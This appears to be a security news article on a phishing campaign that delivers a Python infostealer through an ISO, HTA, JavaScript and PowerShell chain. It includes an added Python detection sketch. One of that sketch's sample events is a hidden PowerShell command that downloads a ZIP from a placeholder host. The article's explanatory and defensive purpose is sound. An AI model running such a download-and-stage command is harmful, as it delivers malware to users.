This new phishing attack uses a sneaky infostealer to cause maximum damage
Security researchers have identified a sophisticated new phishing campaign deploying an unusually comprehensive infostealer designed to exfiltrate a vast array of sensitive data, demonstrating significant advancements in malware capabilities.
Phishing Attack Mechanics
In its advisory, Barracuda Networks details how the attack begins with a deceptive phishing email posing as a purchase order. These emails, sent from a fraudulent account ('yunkun[@]saadelbin[.]com'), carry an attached ISO file disguised as legitimate content. When the ISO is opened, it extracts an HTA (HTML application), which runs on the desktop outside the browser's security restrictions.
This HTA file downloads an obfuscated JavaScript, which in turn triggers a PowerShell script. The script's function is to retrieve a ZIP file from a remote server, containing the final payload: a Python-based infostealer.
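The chain above (ISO attachment, HTA, script, PowerShell fetching a ZIP) leaves a recognisable parent-child trail in process-creation telemetry. The following added example, not part of Barracuda's advisory, walks such a trail over constructed events; it assumes the HTA is executed by mshta.exe, that the mounted ISO appears as a non-C: drive letter, and that the JavaScript stage runs under a Windows script host (the advisory names none of these hosts).

```python
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # process image name, normalised to lower case by the collector
    cmdline: str

# Constructed sample process-creation events (not from the advisory). PID 400 is the
# described chain: HTA run from a mounted ISO (drive E:) -> script host -> PowerShell
# fetching a ZIP. PID 500 is a benign scheduled PowerShell script for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe",      r'mshta.exe "E:\PurchaseOrder.hta"'),
    ProcEvent(300, 200, "wscript.exe",    r"wscript.exe C:\Users\u\AppData\Local\Temp\po.js"),
    ProcEvent(400, 300, "powershell.exe", 'powershell.exe -w hidden -c "iwr http://example.invalid/p.zip -OutFile $env:TEMP\\p.zip"'),
    ProcEvent(500, 100, "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
]

# An .hta loaded from any drive other than the system drive (where a double-clicked ISO mounts).
HTA_OFF_SYSTEM_DRIVE = re.compile(r'\b[D-Z]:\\[^"]*\.hta\b', re.IGNORECASE)
ZIP_DOWNLOAD = re.compile(r"https?://\S+\.zip", re.IGNORECASE)

def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Return ev's parent chain, nearest parent first, stopping at unknown PIDs."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < 32:  # bound against PID-reuse loops
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain

def is_iso_hta_chain(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """True for a PowerShell process that fetches a ZIP and descends from mshta.exe
    running an .hta from a non-system drive, i.e. the chain in the advisory."""
    if ev.image != "powershell.exe" or not ZIP_DOWNLOAD.search(ev.cmdline):
        return False
    return any(a.image == "mshta.exe" and HTA_OFF_SYSTEM_DRIVE.search(a.cmdline)
               for a in ancestors(ev, by_pid))

def flag_events(events: List[ProcEvent]) -> List[int]:
    """Return the PIDs of PowerShell processes that match the chain."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events if is_iso_hta_chain(e, by_pid)]

if __name__ == "__main__":
    print(flag_events(SAMPLE_EVENTS))  # [400]
```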
Infostealer Functionality and Data Collection
The infostealer is notable for the unusual breadth of its data theft. Beyond common targets such as saved passwords, session cookies, and browsing histories, it aggressively harvests credit card information and cryptocurrency data from browser extensions like MetaMask and Coinbase Wallet. It also collects PDF files from directories such as Desktop, Downloads, and Documents, as well as from special %AppData% folders.
Once operational, the malware quickly relays the stolen data to multiple email addresses at 'maternamedical.top', one per data type (e.g., cookies, PDF files). When finished, it deletes itself to evade detection.
Cybersecurity Implications
According to Barracuda, this attack represents a new level in data exfiltration threats. "The sheer volume and sensitivity of the extracted information, from browser data to financial details, presents substantial risks," states Saravanan Mohan, Barracuda's threat analyst manager. Such extensive data harvesting can facilitate further malicious activities such as organizational lateral movement and financial fraud.
In light of these evolving threats, organizations should enforce stringent security measures: robust cybersecurity protocols, continuous threat monitoring, and employee education on phishing tactics. Deploying AI and machine learning-based email protection can also detect and block such phishing attempts before they reach user inboxes.